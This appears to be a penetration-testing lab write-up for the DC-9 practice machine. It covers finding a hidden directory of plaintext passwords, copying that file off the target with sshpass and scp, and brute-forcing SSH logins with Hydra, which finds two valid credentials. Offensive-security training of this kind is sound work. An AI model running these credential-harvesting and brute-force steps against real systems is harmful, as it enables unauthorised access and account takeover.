Hidden Files
Checking for hidden files/directories after performing a manual enumeration on the dc-9(192.168.207.209) host.
/Play/DC-9/4-Post_Enumeration/attachments/{407F6A17-48AC-4B93-9278-5DDDE946A840}.png)
A hidden directory identified at the home directory of the janitor user; .secrets-for-putin
/Play/DC-9/4-Post_Enumeration/attachments/{A8DE061A-9823-45E5-8CFE-04DE918C76B7}.png)
passwords-found-on-post-it-notes.txt
janitor@dc-9:~$ cat .secrets-for-putin/passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ sshpass -p 'Ilovepeepee' scp janitor@$IP:~/.secrets-for-putin/passwords-found-on-post-it-notes.txt .Transferred to Kali
Brute Force Attack
┌──(kali㉿kali)-[~/PEN-200/PG_PLAY/dc-9]
└─$ hydra -L ./system_users.txt -P ./passwords-found-on-post-it-notes.txt -I -t 64 ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-03 01:11:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 64 tasks per 1 server, overall 64 tasks, 102 login tries (l:17/p:6), ~2 tries per task
[DATA] attacking ssh://192.168.207.209:22/
[22][ssh] host: 192.168.207.209 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.207.209 login: fredf password: B4-Tru3-001
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-07-03 01:11:56Found another valid credential; fredf:B4-Tru3-001
Moving on to the lateral movement phase.